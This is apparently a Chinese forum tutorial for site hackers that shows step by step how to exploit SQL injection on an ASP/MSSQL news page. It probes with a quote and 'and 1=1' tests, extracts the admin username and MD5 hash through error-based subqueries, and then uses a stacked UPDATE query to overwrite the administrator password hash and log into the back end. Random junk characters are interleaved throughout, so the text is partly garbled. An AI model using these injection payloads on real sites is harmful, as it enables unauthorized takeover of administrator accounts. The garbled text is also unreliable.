经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
. W- U# q1 y) } T6 h可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)/ }- o( U' k; u8 Z; O
测试如下:6 @8 d$ R2 f5 l- J8 e6 e' I- w3 ]
http://www.tmdsb.com/news.asp?id=1218 F; L* T D: K- N. H; X: R
在地址后输入单引号,显示" I, m- p5 V4 ^& z, C5 T9 F9 |, p
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’2 u, F1 O$ S+ \: |5 Q9 f
字符串 ’’’ 之前有未闭合的引号
7 W, Y. Q% v# _# G) z! M8 i( n/news/tmdws.asp,行631 V Q9 M9 a k
说明没有过滤单引号且数据库是MSSQL.
- u: K) k: h* O4 `7 vand 1=1正常。and 1=2出错。肯定存在注入/ @5 @0 i% x6 M0 ]" K
接着输入
4 q2 ?$ w* A9 l0 u. c _http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)1 Z) o- K% {4 ]
得到帐号为:admin$ u [9 ?8 x* w: u
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)+ W. n! ~. F8 M$ ^ z; B: b, ]$ ]4 o7 r: o2 u
得到密码为:a4716077c2ba075c2 }0 Q5 ]3 g) y. A7 C
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433 W; ~/ D' t! x, k0 N* U
命令如下 :
@5 m" S8 |- |, D: l" |9 X;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
- |8 z3 L0 l* B" L这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |